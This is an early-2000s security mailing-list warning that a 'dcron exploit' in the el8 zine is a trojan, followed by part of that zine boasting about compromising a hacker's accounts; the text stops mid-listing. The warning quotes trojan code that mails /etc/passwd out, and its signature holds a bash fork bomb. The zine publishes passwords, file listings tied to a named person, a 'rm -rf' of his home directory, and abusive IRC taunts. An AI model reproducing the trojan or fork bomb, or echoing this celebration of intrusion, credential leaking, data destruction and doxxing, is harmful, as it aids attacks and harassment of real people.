Michal Zalewski Message-ID: Hello, Most recent (third) issue of "el8" zine, available at http://el8.8m.com, among other things claims to have a "0-day" dcron exploit, allegedely coded by me and Rafal Wojtczuk (Nergal). /*************************************************************************\ | ----====----====---- . . LOCAL DCRON EXPLOIT . . ----====----====---- | | | | brought to you by | | | | (C) Michal Zalewski . and . Nergal | | | | ----------------------------------------------------------------------- | | Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] | | ----------------------------------------------------------------------- | | | \*************************************************************************/ [...cut...] This so-called exploit is already making rounds, not only in script kiddie community, but also being run by many admins to test their boxes. I got reports from several people letting me know "it did not work". I looked at it, and it appears to be a very nicely crafted trojan horse. It does send your /etc/passwd file to a fixed address your-address@mail.com (source code suggests this is only a default, and can be changed by the victim, but because of always true conditional expression, user-specified value is overwritten later; this mailbox is probably valid and attended): /.../ email_address=(char*)strdup(optarg); break; /.../ if(email_address) { email_address=DEFAULT_EMAIL_ADDRESS; } /.../ fprintf(temp,"mail %s < /etc/passwd\n",email_address); Other than that, this exploit will also create a suid copy of /bin/bash in /tmp directory, named 'boomsh'. Even if it was not executed as root, it still gives the attacker an opportunity to escalate privileges locally and gain access to other accounts, perhaps after guessing at least one password. You probably do not want to run this exploit, the same applies to all other exploits coming from untrusted sources =) -- _____________________________________________________ Michal Zalewski [lcamtuf@bos.bindview.com] [security] [http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};: =-=> Did you know that clones never use mirrors? <=-= http://lcamtuf.coredump.cx/photo/ .~e~----------------------------------------------------------~e~. ; *10* lyfestylez of the owned and lamest with jobe -- r0b1nleech; `----------------------------------------------------------------' PART ONE: *** emmanuel'skidsex is now known as r0b1nleech *** Hello, and welcome to the lyfestylez of the owned and + lamest. yoyoyo Unlike in our previous episode, in which we interviewed + pm of sneakerz.org, our next guest, HAS BEEN OWNED (many times). dont do drugs! Everybody, welcome jobe!! jobe is also a w00w00 affiliate. Pardon jobe's behaviour, he just did a line of coke and some + heroin. Ok, what's this, he's wiggling his arms and flailing his legs. Oh nevermind he's raving, ok back to the subject at hand. hey everyone i am jobe, also known as, jbowie, or FATALIST OF BoW. What is your claim to fame? i have shells on numerous hacker boxes, i have been owned many times, + and i have been busted for hacking autonet. oh also i have a sparc, i coded a solaris login exploit (THANKS DUKE), + and i almost spoke at cansecwest. CULT HERO! As you can see we have a very skilled individual here. im also famous for w00giving, i wrote a cron exploit (fuck you vix) i also helped shok get laid! The list keeps going and going :) hey mom, pm, dr, jduck, w00w00, hert, teso, BoW! Shut the fuck up already or I'll drop your spools. ok.. sorry We'll be right back after these messages. PART TWO: Ok jobe, show us around your hacker network. i would also like to state that dropstatd and udpshell are elite ok fine, lets checkout my HERT homedir first (yo gaius!) $ ssh -l jobe np9.hert.org jobe@np9.hert.org's password: abc123hert ! W3lKuM t0 H3Rt HaKr EmErGencY ReSP0nZe Te4M'z NeTw0rK ! ! d0nt h4k, 0r h4ck uz, 0r g3t h4ck3d pl3aSe, itS B4D ! $ ls -al drwxr-x--- 39 jobe jobe 6144 . drwxr-xr-x 72 root wheel 1536 .. drwx------ 3 jobe jobe 512 .BitchX -rw-r--r-- 1 jobe jobe 0 .addressbook -rw------- 1 jobe jobe 2285 .addressbook.lu -rw-r--r-- 1 jobe jobe 6353 .bash_history -rw-r--r-- 1 jobe jobe 667 .bash_profile -rw-r--r-- 1 jobe jobe 651 .cshrc drwx------ 2 jobe jobe 512 .gnupg -rw-r--r-- 1 jobe jobe 255 .login -rw-r--r-- 1 jobe jobe 160 .login_conf -rw------- 1 jobe jobe 371 .mail_aliases -rw-r--r-- 1 jobe jobe 105 .mailrc -rw------- 1 jobe jobe 301 .mysql_history -rw-r--r-- 1 jobe jobe 892212 .phoenix.away -rw------- 1 jobe jobe 8192 .pine-debug1 -rw------- 1 jobe jobe 14247 .pine-debug2 -rw------- 1 jobe jobe 8633 .pine-debug3 -rw------- 1 jobe jobe 7415 .pine-debug4 -rw-r--r-- 1 jobe jobe 11450 .pinerc -rw-r--r-- 1 jobe jobe 69 .profile -rw------- 1 jobe jobe 65 .rhosts -rw-r--r-- 1 jobe jobe 852 .shrc drwxr-xr-x 2 jobe jobe 512 .ssh -rw------- 1 jobe jobe 5316 .viminfo -rw-r--r-- 1 jobe jobe 1003 .vimrc -rw------- 1 jobe jobe 16384 .w00t;.swp -rw------- 1 jobe jobe 1198086 2 drwx--x--x 2 jobe jobe 512 3wahas -rw-r--r-- 1 jobe jobe 8356 3wahas-0.0.1.tar.gz -rw------- 1 jobe jobe 68 4rkl.sh -rw-r--r-- 1 jobe jobe 25974 7350854.c -rw-rw-r-- 1 jobe jobe 29108 ADMmutate-0.8.4.tar.gz drwxr-xr-x 9 jobe jobe 512 BSD -rw------- 1 jobe jobe 1527808 BitchX-1.0c18.core -rw------- 1 jobe jobe 12288 Bowie_Jonathan.doc -r--r--r-- 1 jobe jobe 116408 CHANGES -rw-r--r-- 1 jobe jobe 4781 Collector-1.0.tar.gz -rw------- 1 jobe jobe 24064 Dear Customer.Terracava-Teamdoc.doc -rw------- 1 jobe jobe 1638716 DiabloHack.exe -rw-r--r-- 1 jobe jobe 90 FILE_ID.DIZ drwx------ 3 jobe jobe 512 FreeBSD -rw-r--r-- 1 jobe jobe 7655 Hunter-1.2.tar.gz drwxr-xr-x 2 jobe jobe 512 ICMP-Tunnel_P4-1.0 -rw-r--r-- 1 jobe jobe 7011 ICMP-Tunnel_P4-1.0.tar.gz -rw-rw-r-- 1 jobe jobe 20572160 IDA4.04.tar -r--r--r-- 1 jobe jobe 4190 INSTALL -rw-r--r-- 1 jobe jobe 11776 Jonathan_Bowie_Resume.doc -rw-r--r-- 1 jobe jobe 84854 Lazlov1.01.tar.gz drwx------ 2 jobe jobe 512 Mail -rw------- 1 jobe jobe 15098359 Mailbox -r--r--r-- 1 jobe jobe 26150 Makefile -rw-r--r-- 1 jobe jobe 3881088 Mushroomhead_-_Born_Of_Desire.mp3 -r--r--r-- 1 jobe jobe 21567 OPTIONS -rw------- 1 jobe jobe 944 OSDnew.c -rw------- 1 jobe jobe 990 OSDump.c -rw------- 1 jobe jobe 1224 OSDump.tar.gz -rw-r--r-- 1 jobe jobe 1570944 Opie_and_Anthony_-_Steven_Lynch_-_Special_Olympics.mp3 -rw------- 1 jobe jobe 64240 Picture 17.jpg -rw-r--r-- 1 jobe jobe 2252 README -rw------- 1 jobe jobe 1056 README.osdump -rw------- 1 jobe jobe 5326 README2.TXT -rw------- 1 jobe jobe 7264 SKDoS%s%s%s -rw-r--r-- 1 jobe jobe 6246 Searcher-8.0.tar.gz -rw-r--r-- 1 jobe jobe 16744 Smeagol-4.4.4.tar.gz -rw-r--r-- 1 jobe jobe 1570944 Special_Olympics.mp3 -rw-r--r-- 1 jobe jobe 13547520 System_Of_A_Down.tar -r--r--r-- 1 jobe jobe 10156 TODO -rw-r--r-- 1 jobe jobe 2091383 Theyre_Coming_To_Take_Me_Away.mp3 -rw-rw-r-- 1 jobe jobe 1285708 U4CERT1.WAV -rw-rw-r-- 1 jobe jobe 4077144 U4CERT2.WAV -rw-r--r-- 1 jobe jobe 2055 UnderDC.txt -rw-r--r-- 1 jobe jobe 13506560 WildPackets.AiroPeek.v1.0_Win9xNT2K-DOD.tar -rw------- 1 jobe jobe 63583 WinSCPv0.1b.zip -rw------- 1 jobe jobe 4712086 anet.tar.gz -rw------- 1 jobe jobe 52981760 aux88-electro_boogie.tar -rw-r--r-- 1 jobe jobe 17301 bfx.c -rwxr-xr-x 2 jobe jobe 512 bin -rw-r--r-- 1 jobe jobe 477 bind-4.9.6-REL.tar.gz -rw-r--r-- 1 jobe jobe 2003579 bind-4.9.7-REL.tar.gz -rw------- 1 jobe jobe 465 blah -rw------- 1 jobe jobe 23 blah.c -rw------- 1 jobe jobe 6039 blah.htm -rw------- 1 jobe jobe 958 blahg -rw-rw-r-- 1 jobe jobe 12330 bll -rw-r--r-- 1 jobe jobe 428 blurb -rw------- 1 jobe jobe 0 boo -rw-r--r-- 1 jobe jobe 6204 breal_sm.jpg -rw------- 1 jobe jobe 16701 bud.jpg -rw-rw-r-- 1 jobe jobe 1998216 c06-snmpv1-req-app-r1.jar -rw-rw-r-- 1 jobe jobe 18749 c06-snmpv1-req-enc-r1.jar -rw-r--r-- 1 jobe jobe 27989 cardSelection.pdf -rw-r--r-- 1 jobe jobe 68997120 carlin.tar -rw------- 1 jobe jobe 416 cc1.cc -rw------- 1 jobe jobe 884 cc2.cc -rw-r--r-- 1 jobe jobe 83690221 cde-src.tar.gz -rw------- 1 jobe jobe 564624 cdrtools-1.9a03-win32-bin.zip -rw-r--r-- 1 jobe jobe 1563 cgixperl.sh -rw-r--r-- 1 jobe jobe 4483 cgs.c -rw-r--r-- 1 jobe jobe 220133 charmaps-0.0.tar.gz -rw-r--r-- 1 jobe jobe 1797 cl.pl -rw-r--r-- 1 jobe jobe 3339 clear-1.3.tar.gz -rw-r--r-- 1 jobe jobe 10596 cmctlSparc -rw-r--r-- 1 jobe jobe 1309 cmctlSparc.c drwx------ 2 jobe jobe 512 cmsd -rw------- 1 jobe jobe 6954 cmsd-horizon.tar.gz -rw-r--r-- 1 jobe jobe 1872 cnt-svr-filetransfer.tar.gz drwxr-xr-x 5 jobe jobe 512 compat drwxr-xr-x 3 jobe jobe 512 conf drwxr-xr-x 28 jobe jobe 512 contrib -rwx------ 1 jobe jobe 16384 cpkey.exe -rw-r--r-- 1 jobe jobe 142 cpu -rw-r--r-- 1 jobe jobe 16126 crash_1.gz -rw-r--r-- 1 jobe jobe 16126 crash_2.gz -rw-r--r-- 1 jobe jobe 16126 crash_3.gz -rw-r--r-- 1 jobe jobe 16126 crash_4.gz -rw-r--r-- 1 jobe jobe 16126 crash_5.gz -rw-r--r-- 1 jobe jobe 16126 crash_6.gz -rw-r--r-- 1 jobe jobe 2032769 daemon.xpm -rw-r--r-- 1 jobe jobe 1438 daemonshell.tar.gz -rw------- 1 jobe jobe 573 dead.letter -rw-r--r-- 1 jobe jobe 14763 deefaced.jpg -rw-r--r-- 1 jobe jobe 3437 discover.c -rw-r--r-- 1 jobe jobe 557056 dm_vmw301.zip drwxr-xr-x 6 jobe jobe 512 doc -rwx------ 1 jobe jobe 32768 dropstat -rw-r--r-- 1 jobe jobe 2368 dstatd.c -rw-r--r-- 1 jobe jobe 2122 dtcrash1.pl -rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl -rw-r--r-- 1 jobe jobe 2110 dtcrash2.pl.494 -rw-r--r-- 1 jobe jobe 31569 dtfuck.c -rw-r--r-- 1 jobe jobe 31433 dtspcd_ex_v4.c -rw------- 1 jobe jobe 20050 elfvirii.tar.gz -rw-r--r-- 1 jobe jobe 4820 epcs2.c -rw-r--r-- 1 jobe jobe 4820 epcs2.c.773 -rw-r--r-- 1 jobe jobe 4820 epcs2_fix.c -rwxr-xr-x 1 jobe jobe 5355 er -rw-r--r-- 1 jobe jobe 10074 errors -rw-r--r-- 1 jobe jobe 13357 ex_sol8_login_x86.c -rw-r--r-- 1 jobe jobe 753 exdt-h.txt -rw-r--r-- 1 jobe jobe 1045 exec_race.c drwxrwxr-x 2 jobe jobe 1024 fbsd-src drwxr-xr-x 3 jobe jobe 512 fingerd-fileserver -rw-r--r-- 1 jobe jobe 2937 fingerd-fileserver.tar.gz -rw------- 1 jobe jobe 7126 flyswatter.c -rw-r--r-- 1 jobe jobe 231237 foo.jpg -rw------- 1 jobe force 20992 forbowie.doc -rw------- 1 jobe jobe 24655 forbowie.jpg drwx------ 6 jobe jobe 512 frequency -rw-r--r-- 1 jobe jobe 70090 frequency.tar.gz -rw-r--r-- 1 jobe jobe 17374 fuck.ico -rw-r--r-- 1 jobe jobe 3209 g.c -rw------- 1 jobe jobe 499200 gzip-solaris-2.6-sparc -rw-r--r-- 1 jobe jobe 74 haha -rwxrwxr-x 1 jobe jobe 5005 hair -rw-rw-r-- 1 jobe jobe 477 hair.c -rw------- 1 jobe jobe 22481 hellkit-1.2.tar.gz -rw-r--r-- 1 jobe jobe 1129880 hellodownthere.mpeg -rw-rw-r-- 1 jobe jobe 1635 here.txt -rw------- 1 jobe jobe 15 home.ip -rw-r--r-- 1 jobe jobe 11028 hooklive.c -rw-r--r-- 1 jobe jobe 3133 ia64-linux-execve.cs -rw-r--r-- 1 jobe jobe 1735738 iheartyp drwxr-xr-x 3 jobe jobe 512 include -rw-rw-r-- 1 jobe jobe 772 install.sh -rwxrwxr-x 1 jobe jobe 786028 irc -rw------- 1 jobe jobe 1413120 irc.core -rw------- 1 jobe jobe 3314 irc.log.#phrack drwxrwxr-x 9 jobe jobe 1024 ircii-2.9 -rw-rw-r-- 1 jobe jobe 530294 ircii-2.9-roof.tar.gz -rw------- 1 jobe jobe 6649 irclog.ex -rw------- 1 jobe jobe 5593056 irclog.ex.#!teso -rw------- 1 jobe jobe 2619481 irclog.ex.#!wutang -rw-rw-r-- 1 jobe jobe 18749 j@24.128.147.68 -rw-r--r-- 1 jobe jobe 123738 j@pot.star.delta9-tetrahydrocannabinol.net -rw------- 1 jobe jobe 12288 jbowie_resume.doc -rw-rw-r-- 1 jobe jobe 11 joel.num -rw------- 1 jobe jobe 13333 kain.jpg drwxr-xr-x 2 jobe jobe 512 kfb -rw------- 1 jobe jobe 1812 kfb.tar.gz -rw-rw-r-- 1 jobe jobe 138 kotter.sults drwx------ 2 jobe jobe 512 ldv3 drwx------ 3 jobe jobe 512 ldv6 -rw------- 1 jobe jobe 233325 libnet.tar.gz -rw-r--r-- 1 jobe jobe 6605 license.dat -rw-r--r-- 1 jobe jobe 17391 linspy-for-2.2.x.tgz -rw-rw-r-- 1 jobe jobe 5465996 linux-2.2.16.tar.gz -rw------- 1 jobe force 1978 lolita.c -rw------- 1 jobe jobe 14065 lsd.telnet -rw-r--r-- 1 jobe jobe 73338 m00 drwx------ 2 jobe jobe 512 mail drwxr-xr-x 2 jobe jobe 512 man -rw-r--r-- 1 jobe jobe 46669824 miabang01.mpeg -rwx------ 1 jobe jobe 48735 modctl.c -rw------- 1 jobe jobe 369012 more.core -rw-r--r-- 1 jobe jobe 123738 multiscan-0.8.5.tar.gz -rwxrwxr-x 1 jobe jobe 1192226 mutt drwxrwxr-x 9 jobe jobe 5120 mutt-1.2.5 -rw-r--r-- 1 jobe jobe 1973923 mutt-1.2.5i.tar.gz -rwx--x--x 1 jobe jobe 1198086 mutt2 -rw------- 1 jobe jobe 1696777 n4pst3r.exe -rw-rw-r-- 1 jobe jobe 1738 n4rf drwxr-xr-x 2 jobe jobe 1024 named -rw------- 1 jobe jobe 2581 netbackup_exec.pl -rw------- 1 jobe jobe 1143664 new.mp3 -rw-r--r-- 1 jobe jobe 10061 newhert.txt -rw-r--r-- 1 jobe jobe 282701 odbc.doc.tar.gz -rw-r--r-- 1 jobe jobe 293 optyx.stuff -rw-r--r-- 1 jobe jobe 1527342 outfile -rw-r--r-- 1 jobe jobe 1527342 outfile -rw-r--r-- 1 jobe jobe 58593 patch-1.2.5.rr.compressed.1 drwxr-xr-x 2 jobe jobe 512 paz-1.0 -rw-r--r-- 1 jobe jobe 1684 paz-1.0.tar.gz -rw------- 1 jobe jobe 7704 pc_sice3.zip -rw-r--r-- 1 jobe jobe 338 pcic.out -rw------- 1 jobe jobe 7918 pcnfsd-priv.tar.gz drwx------ 2 jobe jobe 512 pcnfsd_remote -rw------- 1 jobe jobe 142046 penguins.zip -rw------- 1 jobe jobe 161242 pf.irc -rw------- 1 jobe jobe 72171 phear-r0ute.gif -rw------- 1 jobe jobe 2595 pomah.sh -rw------- 1 jobe jobe 0 postponed -rw------- 1 jobe jobe 16124 prettyweed.jpg -rw-r--r-- 1 jobe jobe 2770 probe-2.3.tar.gz -rw-r--r-- 1 jobe jobe 599 readme -rw------- 1 jobe jobe 42247 redir-2.2.1.tar.gz drwxr-xr-x 2 jobe jobe 1024 res -rw-r--r-- 1 jobe jobe 16000 rough.notes -rw------- 1 jobe jobe 7714 rsi-fbsd3.0.tgz -rw-rw-r-- 1 jobe jobe 18 server -rwxr-xr-x 1 jobe jobe 172032 sgiawd-lmcrypt -rwxr-xr-x 1 jobe jobe 293004 sgifd-lmcrypt drwxrwxr-x 6 jobe jobe 512 shellkit -rw-rw-r-- 1 jobe jobe 16370 shellkit-20010618.tgz drwxr-xr-x 7 jobe jobe 512 shres -rw-r--r-- 1 jobe jobe 13076 sl-binary-kit.tar.gz.pgp -rw------- 1 jobe jobe 449 spoof.c -rw------- 1 jobe jobe 3235 spooflib.c drwxr-xr-x 4 jobe jobe 512 src -rw-r--r-- 1 jobe jobe 1911375 ssh-2.4.0.tar.gz -rw-r--r-- 1 jobe jobe 300240 sshd.stuff.tar.gz -rw-r--r-- 1 jobe jobe 45337 sshd_exp.tgz -rw-rw-r-- 1 jobe jobe 6444 strmod -rwx------ 1 jobe jobe 5442 strmod.c -rw------- 1 jobe jobe 2707 strmod.tar.gz -rwxr-xr-x 1 jobe jobe 14754 strs -rw-r--r-- 1 jobe jobe 294 strs.c -rw-r--r-- 1 jobe jobe 6360 t-shirt-4.0.tar.gz -rw-r--r-- 1 jobe jobe 2123 t3.c -rwxr-xr-x 1 jobe jobe 27505 tb -rw-r--r-- 1 jobe jobe 68401 thc-uht1.tgz -rwxr-xr-x 1 jobe jobe 14754 tmp -rw------- 1 jobe jobe 26 tmp.c drwxr-xr-x 3 jobe jobe 512 tools -rw-r--r-- 1 jobe jobe 18860 tsl_bind.c -rw------- 1 jobe jobe 9886 ttdb4sol26.c -rw------- 1 jobe jobe 10150 ttnew.c drwx------ 2 jobe jobe 512 tx -rw-r--r-- 1 jobe jobe 23145 tx.tar.gz -rw------- 1 jobe jobe 5290472 utssrc.tar.gz -rwx------ 1 jobe jobe 275 w.pl -rw------- 1 jobe jobe 8385 w00lien-20020217.tgz -rw-rw-r-- 1 jobe jobe 28218 w00t; -rw------- 1 jobe jobe 3338 w1.sh -rw------- 1 jobe jobe 3453 w1ng.sh drwxr-xr-x 2 jobe jobe 512 wepcrack-v0.3 -rw------- 1 jobe jobe 8771 wepcrack-v0.3.tar.gz -rw------- 1 jobe jobe 2762 win2kfaq.txt drwxrwxr-x 4 jobe jobe 1024 winpenguins drwx------ 2 jobe jobe 512 worm -rw------- 1 jobe jobe 24088 worm-src.tar.gz -rw-r--r-- 1 jobe jobe 3469 wuftpfmt.pl -rw------- 1 jobe jobe 58909 xenv2.tgz -rw-r--r-- 1 jobe jobe 4949600 ya_it_doez.mp3 -rw-r--r-- 1 jobe jobe 3176 zap3.tar.gz Awesome homedir, you are an old school hacker it seems. well i started hacking phone switches and then moved on to redhat + systems. i'm currently into darwin systems. lots of porn on those. Your email is huge! fuck yah man i g0t so much email im subscribed to securityfocus bugtraq incidents w00w00 list vuln dev hert private mailing list teso private mailing list teso public mailing list hert public mailing list vuln dev honeypots private BoW mailing list raver's mailing list the porn trader's mailing list also the dropstatd withdrawl mailing list What is in your .phoenixaway? everything anyone has messaged me since 1996. I PUT SMILEY FACES IN SHELLCODE BECAUSE IT MAKES ME HAPPY Ok I am going to rm your hert home dir now ok? no problem, let me back it up first No. $ rm -rNOOOOOOOOOOOf ~jobeOFKAG@K@#3,2#F_EKGFDS $ rm -rf ~jobe $ ^C^D^D <[rooster]> jbl: i am in the process of interviewing at enterasys i got an interview with a staffing firm tomorrow morning with mcdonalds > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D > I JUST GOT RM'D damn that sux hi homo jobe you tool *jeru* howd you own him? *jeru* howd you own him? > *jeru* howd you own him? if he ownz np9 it's not that hard. NOTE TO SELF, IT HAS NO SUIDS, NO PUBLIC VULNS, HOW COULD JOBE OWN IT? > WOOWOO IS NEXT > JNATHAN IS NEXT > YOUR FUCKED KID lol NOTE TO SELF, vmy lol, VMY GOT OWNED ONCE! man noone ever gets rmed any more > ILL RM YOU NEXT PUSSY duh like the whole world doesn't know my passwd's NOT TO SELF, GOD JOBE IS A FUCKING IDIOT uh go for it bro > duh like the whole world doesn't know my passwd's > duh like the whole world doesn't know my passwd's hey thats not funny stop Ok, take us to the next stop along the tour. lets check out slack.net next. $ ssh -l jbowie slack.net jbowie@slack.net's password: abc123slack here is my homedir: $ ls -al drwxr-x--x 9 jbowie jbowie 2560 . drwxr-xr-x 807 root wheel 13312 .. -rw-r--r-- 1 jbowie jbowie 51 .addressbook -rw-r--r-- 1 jbowie jbowie 2342 .addressbook.lu -rw-r--r-- 1 jbowie jbowie 117 .bash_history -rw-r--r-- 1 jbowie jbowie 716 .cshrc -rw------- 1 jbowie jbowie 2314 .history -rw-r--r-- 1 jbowie jbowie 322 .irc.easyinst.status -rw-r--r-- 1 jbowie jbowie 12 .ircrc -rw-r--r-- 1 jbowie jbowie 233 .login -rw-r--r-- 1 jbowie jbowie 105 .mailrc -rw-r--r-- 1 jbowie jbowie 1148 .phoenix -rw-r--r-- 1 jbowie jbowie 18841 .phoenix.away -rw------- 1 jbowie jbowie 8191 .pine-debug1 -rw------- 1 jbowie jbowie 19392 .pine-debug2 -rw------- 1 jbowie jbowie 9905 .pine-debug3 -rw------- 1 jbowie jbowie 7737 .pine-debug4 -rw-r--r-- 1 jbowie jbowie 11891 .pinerc -rw-r--r-- 1 jbowie jbowie 114 .profile lrwxr-xr-x 1 jbowie jbowie 9 .rhosts -> /dev/null drwxr-xr-x 2 jbowie jbowie 512 .ssh drwxr-xr-x 5 jbowie jbowie 512 .tin -rw-r--r-- 1 jbowie jbowie 15 475.shtml -rw-r--r-- 1 jbowie jbowie 15 547.shtml -rw-r--r-- 1 jbowie jbowie 6952 574.shtml -rw-r--r-- 1 jbowie jbowie 15 745.shtml -rw-r--r-- 1 jbowie jbowie 15 754.shtml -rw-r--r-- 1 jbowie jbowie 192540 BIOS.ZIP -rw------- 1 jbowie jbowie 51591041 Mailbox -rw-rw-rw- 1 jbowie jbowie 0 Mailbox.lock.949010036.18118.schwing -rw-r--r-- 1 jbowie jbowie 0 Mailbox.lock.953165142.7684.schwing -rw-r--r-- 1 jbowie jbowie 481 Makefile -rw-r--r-- 1 jbowie jbowie 179 README drwxr-xr-x 2 jbowie jbowie 512 WWW -rw-r--r-- 1 jbowie jbowie 1100 a -rwxr-xr-x 1 jbowie jbowie 14758 add -rw-r--r-- 1 jbowie jbowie 80 add.c -rw-r--r-- 1 jbowie jbowie 591 arbcmdsc.tar.gz -rw-r--r-- 1 jbowie jbowie 400 asm.c -rw------- 1 jbowie jbowie 532480 authlie-1.0.tar -rw-r--r-- 1 jbowie jbowie 34816 benefits.doc -rw-r--r-- 1 jbowie jbowie 1244994 bind-src.tar.gz -rw-r--r-- 1 jbowie jbowie 4947 bind8.html -rw-r--r-- 1 jbowie jbowie 596 blah -rw-r--r-- 1 jbowie jbowie 1187 blah.htmnl -rw-r--r-- 1 jbowie jbowie 2779 blah.lm -rw-r--r-- 1 jbowie jbowie 596 blah.new -rw-r--r-- 1 jbowie jbowie 274 blah.sort -rwxr-xr-x 1 jbowie jbowie 6174 bufmod.7 -rwxr-xr-x 1 jbowie jbowie 20566 cae -rw------- 1 jbowie jbowie 1282396 cae.core -rw-r--r-- 1 jbowie jbowie 375 cool.fortunes drwxr-xr-x 4 jbowie jbowie 512 cyberarmy -rw-r--r-- 1 jbowie jbowie 731 cyberarmy.exp.c -rw------- 1 jbowie jbowie 307 dead.letter -rw-r--r-- 1 jbowie jbowie 29819 dlcommon.c -rw-r--r-- 1 jbowie jbowie 1178 dlinfo.c -rw-r--r-- 1 jbowie jbowie 2493 dlmdata.c -rwxr-xr-x 1 jbowie jbowie 1937 dlpi.7 -rw-r--r-- 1 jbowie jbowie 3064 dlrcv.c -rw-r--r-- 1 jbowie jbowie 498 dltest.h -rw-r--r-- 1 jbowie jbowie 79264 dltest.ps -rwxr-xr-x 1 jbowie jbowie 39859 dltest.tar.gz -rw-r--r-- 1 jbowie jbowie 2727 dlunitdatareq.c -rw-r--r-- 1 jbowie jbowie 44544 dracon-olc.doc -rw-r--r-- 1 jbowie jbowie 0 dumb.c -rwxr-xr-x 1 jbowie jbowie 14779 f00 -rw-r--r-- 1 jbowie jbowie 3212 f00.c -rw------- 1 jbowie jbowie 348508 f00.core -rw------- 1 jbowie jbowie 348508 f00.core -rw-r--r-- 1 jbowie jbowie 274 findproc.c -rw-r--r-- 1 jbowie jbowie 30665 fornax-0.0.5.tar.gz -rwxr-xr-x 1 jbowie jbowie 4261 fp -rw------- 1 jbowie jbowie 1939 fts.c -rwxr-xr-x 1 jbowie jbowie 1248915 irc -rw-r--r-- 1 jbowie jbowie 530294 ircii-2.9-roof.tar.gz -rw------- 1 jbowie jbowie 5040 irclog.ex.#!w00w00 -rw-r--r-- 1 jbowie jbowie 1597856 jobe.attrition.tar.gz -rw-r--r-- 1 jbowie jbowie 2750 jobe.resume -rw-r--r-- 1 jbowie jbowie 4792 jobelog -rwxr-xr-x 1 jbowie jbowie 7710 le.7 -rw-r--r-- 1 jbowie jbowie 4914 lsa.synth drwx------ 2 jbowie jbowie 512 mail -rw-r--r-- 1 jbowie jbowie 1975 nap.c -rw-r--r-- 1 jbowie jbowie 4413 netmap.bmp.gz -rw-r--r-- 1 jbowie jbowie 594 new -rw-r--r-- 1 jbowie jbowie 456 new.procs -rw-r--r-- 1 jbowie jbowie 508 new.procs2 -rw-r--r-- 1 jbowie jbowie 916150 nsrouter.c675.2.3.0.053.bin -rw-r--r-- 1 jbowie jbowie 161242 pf.irc -rwxr-xr-x 1 jbowie jbowie 8268 pfmod.7 -rw-r--r-- 1 jbowie jbowie 480 procs -rw-r--r-- 1 jbowie jbowie 518 procs2 -rw-r--r-- 1 jbowie jbowie 3360 prym-log drwxr-xr-x 3 jbowie jbowie 512 public_html drwxr-xr-x 2 jbowie jbowie 512 s0x -rw-r--r-- 1 jbowie jbowie 5419 s0x.tgz -rw-r--r-- 1 jbowie jbowie 65 safsite.out -rw-r--r-- 1 jbowie jbowie 42949 sexchart.8 -rw-r--r-- 1 jbowie jbowie 600 shellcode2.c -rw-r--r-- 1 jbowie jbowie 669 sparccmd.c -rwxr-xr-x 1 jbowie jbowie 120642 spook -rw------- 1 jbowie jbowie 1049 spook.c -rw-r--r-- 1 jbowie jbowie 365 test.c -rwxr-xr-x 1 jbowie jbowie 6007 w00crond I took a look at f00.c, that the lsd-pl ldt exploit isn't it? yes Did it work on slack.net openbsd 2.4? i almost got it working i think it keeps segfaulting so that is a good sign $ rm ~~~~~~~~~jjjjjjjjjjbooooooooooowwwwwwwiieeeeeeeeeeeeeeeeeeeeee *** Mode change "-o+b jdogg *!jbowie@slack.net" on channel #phrack by Swern hows it comin? > RMD > OWNED *** You have been kicked off channel #cdc by jnathan (Bitch-X BaBy!) man i can't believe it took u guys this long ive used the same password on every shell box for like 7 years took you long enough to catch on NOTE TO SELF, MAYBE WE ARE JUST TIRED OF OWNING YOU AND FELT LIKE RMING YOU. > EVERYONE HAS YOUR PASSWORD JOBE > WE'VE HAD YOUR BOXES FOR 7 YEARS didnt i already tell you that retard > JOBE > FACE IT > YOUR MYTHICAL HACKER MYSTIQUE > HAS BEEN DESTROYED > key_22_quantum.efni.com.pub > WE OWNED YOUR LAME SOLARIS FOR YEARS TOO what mythical hacker mystique? NOTE TO SELF, JOBE IS THE DARKSIDE. efni waz megaowned jdogg heh this is getting old :) who are you? funny, but old > SHUT THE FUCK UP JNATHAN wait what about apollo.gtei.net? NOTE TO SELF, EKIM IS A NARC. *kozubik* are you JD roberson ? > APOLLO.GTI.NET > GAIUS OWNED THAT *** kozubik has changed the topic on channel #cdc to Nice nice very nice. > AND TUNNELX IT lol hahaha the gre thing must be a different jdogg. i dont use netscape for my pron u missed one or 2 but thatz ok > WHICH ONE jdogg is last figure it out hacker genius > THE OTHERS NOT SOGOOD > DONT MAKE ME GO RM THOSE TOO > 0wned.org 1024 41 63897960634680087987473578821662473115676645146414098567729063962534050419025098865273166743308876730034769029776760707909878397798858888397059595356385321592348348338355240266795644650505202538605163304067738669371599283352177980986565362816775661015680930496199752053852827022342775527838857458044942037271 ok let us check out my home box now this is the grand finale Great scotts. $ ls -al total 230904 drwxr-xr-x 10 j staff 1536 . drwxr-xr-x 7 root root 512 .. -rw------- 1 420 staff 240 .Xauthority -rw-r--r-- 1 420 staff 124 .cshrc -rw-r--r-- 1 420 staff 581 .login -rw------- 1 root staff 100 .sh_history drwxr-xr-x 3 420 staff 512 .ssh2 drwxrwxrwx 86 420 staff 2048 7_Recommended -rw-r--r-- 1 420 staff 41787799 7_Recommended.zip -rwxr-xr-x 1 j staff 6996 Test -rw-r--r-- 1 j staff 77 Test.c -rwxr-xr-x 1 root other 70960 a -rw-r--r-- 1 root other 126 a.c -rwxr-xr-x 1 root other 7408 addr_wr_test -rw-r--r-- 1 root other 285 addr_wr_test.c -rwxr-xr-x 1 j staff 7192 b1nd -rw-r--r-- 1 j staff 141 b1nd.c -r-xr-xr-x 1 root other 6874624 bash-2.05-sol7-sparc-local -rwxr-xr-x 1 j staff 18436 bb -rw-r--r-- 1 j staff 11694 bb.c drwxr-xr-x 15 77 1002 1024 binutils-020210 -rw-r--r-- 1 root other 57057280 binutils.tar drwxr-xr-x 9 root root 512 cde -rw------- 1 root other 29616 core -rwxr-xr-x 1 j staff 3255348 dbx-sparc -r-xr-xr-x 1 root other 411648 gzip-1.2.4-sol7-intel-local -r-xr-xr-x 1 root other 291328 gzip-1.2.4a-sol7-intel-local -rw-r--r-- 1 root other 1489931 includes.tar.gz -rwxr-xr-x 1 420 staff 2326360 irc drwxr-xr-x 9 420 staff 1024 ircii-2.9 -rw-r--r-- 1 420 staff 2508800 ircii-2.9-roof.tar -r-xr-xr-x 1 j staff 29512 login drwxr-xr-x 2 